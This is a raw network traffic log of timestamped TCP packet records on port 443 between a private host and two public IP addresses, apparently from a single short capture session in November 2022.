Nov 24, 2022 12:20:47.333849907 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.334034920 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.345685005 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.345715046 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.350109100 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.350128889 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.416290045 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.416397095 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.416511059 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.416857958 CET	49717	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.416893959 CET	443	49717	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.449889898 CET	49719	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.449955940 CET	443	49719	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.450053930 CET	49719	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.450527906 CET	49719	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.450546026 CET	443	49719	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.450651884 CET	443	49719	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.572690010 CET	49721	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.572766066 CET	443	49721	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.572854996 CET	49721	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.573434114 CET	49721	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:47.573466063 CET	443	49721	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.573520899 CET	443	49721	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:47.577001095 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.577049017 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.577147961 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.587580919 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.587621927 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.631416082 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.631485939 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.645615101 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.645641088 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.654135942 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.654160976 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.737809896 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.737926006 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.737941027 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.737986088 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.738224030 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.738303900 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.738679886 CET	443	49720	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:47.738739014 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:47.738760948 CET	49720	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.267606974 CET	49722	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:48.267667055 CET	443	49722	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:48.268081903 CET	49722	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:48.268081903 CET	49722	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:48.268130064 CET	443	49722	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:48.268250942 CET	443	49722	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:48.397665024 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.397753954 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.397881985 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.398364067 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.398437977 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.459189892 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.459326029 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.470410109 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.470442057 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.471054077 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.471172094 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.471873045 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.471894979 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.499147892 CET	49724	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:48.499203920 CET	443	49724	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:48.500302076 CET	49724	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:48.500684023 CET	49724	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:48.500705004 CET	443	49724	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:48.500775099 CET	443	49724	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:48.565098047 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.565221071 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.565232038 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:48.565310955 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.578407049 CET	49723	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:48.578449011 CET	443	49723	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.142592907 CET	49725	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.142646074 CET	443	49725	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.143165112 CET	49725	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.143907070 CET	49725	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.143932104 CET	443	49725	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.144001007 CET	443	49725	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.148370981 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.148433924 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.148569107 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.150845051 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.150895119 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.198266029 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.201375008 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.217401028 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.217433929 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.222402096 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.222424984 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.334752083 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.334863901 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.334863901 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.334933043 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.335278034 CET	49726	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.335306883 CET	443	49726	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.371769905 CET	49727	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.371834040 CET	443	49727	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.371938944 CET	49727	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.372489929 CET	49727	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.372539043 CET	443	49727	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.372612000 CET	443	49727	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.458022118 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.458082914 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.458167076 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.460608006 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.460635900 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.512303114 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.512399912 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.525762081 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.525784016 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.530025005 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.530051947 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.559349060 CET	49729	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.559406042 CET	443	49729	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.559484959 CET	49729	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.561697960 CET	49729	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.561742067 CET	443	49729	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.561800003 CET	443	49729	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.633744955 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.633836031 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.633866072 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.633919001 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.638139963 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.638246059 CET	443	49728	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.638319016 CET	49728	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.699913025 CET	49730	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.699975967 CET	443	49730	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.700073004 CET	49730	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.702033997 CET	49730	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.702076912 CET	443	49730	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.702127934 CET	443	49730	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.781682014 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.781734943 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.781836987 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.782859087 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.782872915 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.809278965 CET	49732	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.809334040 CET	443	49732	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.809406042 CET	49732	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.811409950 CET	49732	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:49.811431885 CET	443	49732	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.811489105 CET	443	49732	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:49.831947088 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.832082033 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.854660034 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.854712009 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.855168104 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.855267048 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.876204967 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.876233101 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.942590952 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.942692041 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.942703009 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:49.942753077 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.947324991 CET	49731	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:49.947365046 CET	443	49731	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.028458118 CET	49733	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.028523922 CET	443	49733	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.028620005 CET	49733	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.028990030 CET	49733	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.029025078 CET	443	49733	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.029071093 CET	443	49733	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.109153986 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.109225988 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.109309912 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.113260031 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.113312960 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.137566090 CET	49735	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.137612104 CET	443	49735	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.137686014 CET	49735	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.138174057 CET	49735	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.138189077 CET	443	49735	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.138231993 CET	443	49735	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.162023067 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.162162066 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.172452927 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.172509909 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.177253008 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.177365065 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.248837948 CET	49736	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.248895884 CET	443	49736	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.249016047 CET	49736	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.249346018 CET	49736	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.249376059 CET	443	49736	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.249413967 CET	443	49736	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.267515898 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.267595053 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.267647028 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.267647028 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.299983978 CET	49734	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.300017118 CET	443	49734	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.412833929 CET	49737	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.412929058 CET	443	49737	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.413139105 CET	49737	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.413503885 CET	49737	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.413551092 CET	443	49737	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.413611889 CET	443	49737	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.533181906 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.533242941 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.533345938 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.533992052 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.534028053 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.578977108 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.579063892 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.604955912 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.604974031 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.636076927 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.636106014 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.640861034 CET	49739	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.640906096 CET	443	49739	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.640995979 CET	49739	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.641681910 CET	49739	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.641709089 CET	443	49739	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.641781092 CET	443	49739	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.701265097 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.703860998 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.703908920 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.704063892 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.738425970 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.738557100 CET	443	49738	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.738627911 CET	49738	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.785022974 CET	49740	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.785101891 CET	443	49740	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.785212994 CET	49740	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.785512924 CET	49740	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:50.785528898 CET	443	49740	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.785648108 CET	443	49740	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:50.955291033 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.955372095 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:50.955483913 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.960143089 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:50.960201025 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.011672974 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.011796951 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.066092968 CET	49742	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.066155910 CET	443	49742	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.066272020 CET	49742	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.066849947 CET	49742	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.066890955 CET	443	49742	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.066950083 CET	443	49742	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.068135977 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.068169117 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.068831921 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.068928003 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.099955082 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.099981070 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.163716078 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.163863897 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.164015055 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.173602104 CET	49741	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.173645973 CET	443	49741	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.304286957 CET	49743	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.304353952 CET	443	49743	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.304649115 CET	49743	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.304966927 CET	49743	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.304980993 CET	443	49743	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.305587053 CET	443	49743	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.367733002 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.367786884 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.367871046 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.378798962 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.378846884 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.457792997 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.457876921 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.474189043 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.474215984 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.481470108 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.481494904 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.564714909 CET	49745	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.564774990 CET	443	49745	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.564872026 CET	49745	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.565222979 CET	49745	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.565238953 CET	443	49745	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.565291882 CET	443	49745	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.567637920 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.567729950 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.567748070 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.567804098 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.619807959 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.619946957 CET	443	49744	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.620014906 CET	49744	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.770332098 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.770387888 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.770493031 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.775773048 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.775808096 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.812946081 CET	49747	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.813018084 CET	443	49747	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.813114882 CET	49747	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.813443899 CET	49747	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:51.813471079 CET	443	49747	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.813662052 CET	443	49747	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:51.835692883 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.835869074 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.880695105 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.880737066 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.881304979 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.881393909 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.882210970 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.882236958 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.952510118 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.952631950 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.952686071 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.952771902 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.952877998 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:51.952955008 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.991271019 CET	49746	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:51.991312027 CET	443	49746	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.274579048 CET	49748	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.274631977 CET	443	49748	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.274718046 CET	49748	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.275125027 CET	49748	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.275152922 CET	443	49748	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.275221109 CET	443	49748	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.415813923 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.415869951 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.415950060 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.440130949 CET	49750	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.440263987 CET	443	49750	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.440388918 CET	49750	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.440805912 CET	49750	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.440850973 CET	443	49750	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.440926075 CET	443	49750	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.652817965 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.652865887 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.705532074 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.705708027 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.761750937 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.761781931 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.783812046 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.783849955 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.852379084 CET	49751	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.852451086 CET	443	49751	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.852571964 CET	49751	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.853192091 CET	49751	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:52.853212118 CET	443	49751	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.853889942 CET	443	49751	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:52.878776073 CET	443	49749	172.66.43.60	192.168.2.3
